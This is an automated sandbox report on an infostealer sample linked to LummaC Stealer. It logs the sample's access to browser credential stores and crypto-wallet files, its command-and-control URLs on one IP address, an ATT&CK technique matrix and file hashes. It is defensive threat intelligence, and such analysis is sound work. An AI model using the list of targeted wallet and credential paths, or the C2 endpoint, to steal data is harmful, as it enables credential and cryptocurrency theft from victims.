                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.dbJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhlJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfelJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.oldJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\I5jG2Os8GA.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: Yara matchFile source: Process Memory Space: I5jG2Os8GA.exe PID: 7276, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.3.I5jG2Os8GA.exe.4280000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.I5jG2Os8GA.exe.4280000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.I5jG2Os8GA.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.I5jG2Os8GA.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000003.1263036918.0000000004280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3055015014.0000000004200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.3053699869.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: I5jG2Os8GA.exe PID: 7276, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
                    Native API
                    1
                    LSASS Driver
                    1
                    Process Injection
                    32
                    Virtualization/Sandbox Evasion
                    1
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    2
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    DLL Side-Loading
                    1
                    LSASS Driver
                    1
                    Process Injection
                    LSASS Memory471
                    Security Software Discovery
                    Remote Desktop Protocol31
                    Data from Local System
                    1
                    Non-Application Layer Protocol
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading
                    1
                    Deobfuscate/Decode Files or Information
                    Security Account Manager32
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive11
                    Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                    Obfuscated Files or Information
                    NTDS2
                    Process Discovery
                    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script22
                    Software Packing
                    LSA Secrets1
                    Account Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading
                    Cached Domain Credentials1
                    System Owner/User Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync11
                    File and Directory Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem113
                    System Information Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    I5jG2Os8GA.exe89%ReversingLabsWin32.Trojan.Smokeloader
                    I5jG2Os8GA.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://94.158.244.69/ZD8C0%Avira URL Cloudsafe
                    http://94.158.244.69/c2sockv0%Avira URL Cloudsafe
                    http://94.158.244.69/ZKAf0%Avira URL Cloudsafe
                    http://94.158.244.69/xjsh0%Avira URL Cloudsafe
                    http://94.158.244.69/c2socks0%Avira URL Cloudsafe
                    http://94.158.244.69/SO0%Avira URL Cloudsafe
                    http://94.158.244.69/l0FL0%Avira URL Cloudsafe
                    http://94.158.244.69/O4ze0%Avira URL Cloudsafe
                    http://94.158.244.69/c2sock50%Avira URL Cloudsafe
                    http://94.158.244.69/9dokr0%Avira URL Cloudsafe
                    http://94.158.244.69/0WJ90%Avira URL Cloudsafe
                    http://94.158.244.69/c2socks00%Avira URL Cloudsafe
                    http://94.158.244.69/t8EB0%Avira URL Cloudsafe
                    http://94.158.244.69/c2sockP0%Avira URL Cloudsafe
                    http://94.158.244.69/Xl2v0%Avira URL Cloudsafe
                    http://94.158.244.69/c2sockb0%Avira URL Cloudsafe
                    http://94.158.244.69/rF5X0%Avira URL Cloudsafe
                    http://94.158.244.69/iU890%Avira URL Cloudsafe
                    http://94.158.244.69/xQclE0%Avira URL Cloudsafe
                    http://94.158.244.69/j3Rh0%Avira URL Cloudsafe
                    http://94.158.244.69/e/IR0%Avira URL Cloudsafe
                    http://94.158.244.69/qSC20%Avira URL Cloudsafe
                    http://94.158.244.69/rD3S0%Avira URL Cloudsafe
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://94.158.244.69/c2sockfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://94.158.244.69/xjshI5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://94.158.244.69/c2sockvI5jG2Os8GA.exe, 00000000.00000002.3060354887.00000000052A0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/chrome_newtabI5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        http://94.158.244.69/c2sock5I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmp, I5jG2Os8GA.exe, 00000000.00000002.3060914805.0000000005504000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://94.158.244.69/ZD8CI5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://94.158.244.69/c2socksI5jG2Os8GA.exe, 00000000.00000002.3060914805.0000000005504000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://duckduckgo.com/ac/?q=I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://94.158.244.69/ZKAfI5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoI5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://94.158.244.69/9dokrI5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://94.158.244.69/l0FLI5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://94.158.244.69/SOI5jG2Os8GA.exe, 00000000.00000002.3054795348.00000000027D9000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://94.158.244.69/O4zeI5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://94.158.244.69/0WJ9I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://crl.rootca1.amazontrust.com/rootca1.crl0I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://upx.sf.netAmcache.hve.14.drfalse
                                  high
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://ocsp.rootca1.amazontrust.com0:I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://www.ecosia.org/newtab/I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brI5jG2Os8GA.exe, 00000000.00000002.3061736337.0000000005C99000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://94.158.244.69/c2socks0I5jG2Os8GA.exe, 00000000.00000002.3054795348.00000000027FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://94.158.244.69/Xl2vI5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://ac.ecosia.org/autocomplete?q=I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://94.158.244.69/j3RhI5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://94.158.244.69/c2sockPI5jG2Os8GA.exe, 00000000.00000002.3060354887.00000000052A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://x1.c.lencr.org/0I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://x1.i.lencr.org/0I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchI5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://94.158.244.69/xQclEI5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?I5jG2Os8GA.exe, 00000000.00000002.3060914805.00000000055A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://94.158.244.69/t8EBI5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://94.158.244.69/I5jG2Os8GA.exe, 00000000.00000002.3060914805.000000000566B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://94.158.244.69/rF5XI5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://94.158.244.69/c2sockbI5jG2Os8GA.exe, 00000000.00000002.3060354887.00000000052A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://94.158.244.69/iU89I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://support.mozilla.org/products/firefoxgro.allI5jG2Os8GA.exe, 00000000.00000002.3061736337.0000000005C99000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://94.158.244.69/e/IRI5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=I5jG2Os8GA.exe, 00000000.00000003.1743443894.00000000044A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://94.158.244.69/qSC2I5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://94.158.244.69/rD3SI5jG2Os8GA.exe, 00000000.00000002.3056836653.0000000004E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs
                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          94.158.244.69
                                                          unknownMoldova Republic of
                                                          39798MIVOCLOUDMDtrue
                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1555045
                                                          Start date and time:2024-11-13 10:52:41 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 7m 13s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:16
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:I5jG2Os8GA.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:1fbbcb432e80904478cd943fef44a3b5632dfd25d77ad2c4995d8ccc55a3b919.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@2/5@0/1
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 95%
                                                          • Number of executed functions: 59
                                                          • Number of non-executed functions: 80
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Override analysis time to 240s for sample files taking high CPU consumption
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: I5jG2Os8GA.exe
                                                          TimeTypeDescription
                                                          04:56:31API Interceptor1x Sleep call for process: WerFault.exe modified
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          94.158.244.69OlZzqwjrwO.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69/c2sock
                                                          Vd3tOP5WSD.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69/c2sock
                                                          g1kWKm20Z5.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69/c2sock
                                                          cgln32y2HF.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69/c2sock
                                                          4Oq9i3gm0g.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69/c2sock
                                                          RX7nieXlNm.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69/c2sock
                                                          5M5e9srxkE.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69/c2sock
                                                          dV01QsYySM.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69/c2sock
                                                          BeO2C8S5Ly.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69/c2sock
                                                          ToNaCrWjm7.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69/c2sock
                                                          No context
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          MIVOCLOUDMDOlZzqwjrwO.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69
                                                          Vd3tOP5WSD.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69
                                                          g1kWKm20Z5.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69
                                                          cgln32y2HF.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69
                                                          4Oq9i3gm0g.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69
                                                          RX7nieXlNm.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69
                                                          5M5e9srxkE.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69
                                                          dV01QsYySM.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69
                                                          BeO2C8S5Ly.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69
                                                          ToNaCrWjm7.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 94.158.244.69
                                                          No context
                                                          No context
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.8419194117709884
                                                          Encrypted:false
                                                          SSDEEP:96:UBLec+TOslWhclM7Zf/QXIDcQhc6hcEKcw3J++HbHg/8BRTf3Oy1EoqzIPTrXNf9:UteHTOMZ50/lA9PjudzuiF8Z24IO8Q7
                                                          MD5:A3F8DB118EE11D68176FFBABEF207557
                                                          SHA1:050E41D44613D77444E2ED6F7F2E78241E723EC9
                                                          SHA-256:60DC9FF7A187E2FBF34DCF1B37F233051257C4FC44E59E4DF4D02406E410777E
                                                          SHA-512:27C7A018250403B711B21573633BFE13BF11429E6B2207C8FF35C1EE036F8AC9BEC344322CEED8C32ADF12276DE06D39F5267970D94EACA6BD84EAE2BFF4C57E
                                                          Malicious:true
                                                          Reputation:low
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.9.6.5.3.8.6.8.4.5.2.7.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.9.6.5.3.8.7.2.2.0.2.5.8.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.5.4.5.2.8.6.3.-.e.e.b.7.-.4.e.6.7.-.8.9.6.9.-.f.2.2.1.c.a.e.c.3.8.3.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.5.0.a.5.7.f.e.-.3.e.b.9.-.4.b.b.d.-.8.2.6.a.-.a.9.0.6.3.5.b.c.f.8.1.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.I.5.j.G.2.O.s.8.G.A...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.6.c.-.0.0.0.1.-.0.0.1.3.-.1.5.8.4.-.4.f.e.6.b.1.3.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.a.c.0.b.9.c.4.e.7.9.e.2.b.c.f.9.e.5.b.c.c.c.8.4.c.4.c.d.b.c.b.0.0.0.0.f.f.f.f.!.0.0.0.0.6.b.9.f.2.b.f.9.8.2.e.0.7.1.b.f.d.9.b.4.b.3.7.1.e.5.8.1.9.9.3.e.d.3.e.f.8.a.7.c.!.I.5.j.G.2.O.s.8.G.A...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 15 streams, Wed Nov 13 09:56:26 2024, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):45420
                                                          Entropy (8bit):2.6033013992258436
                                                          Encrypted:false
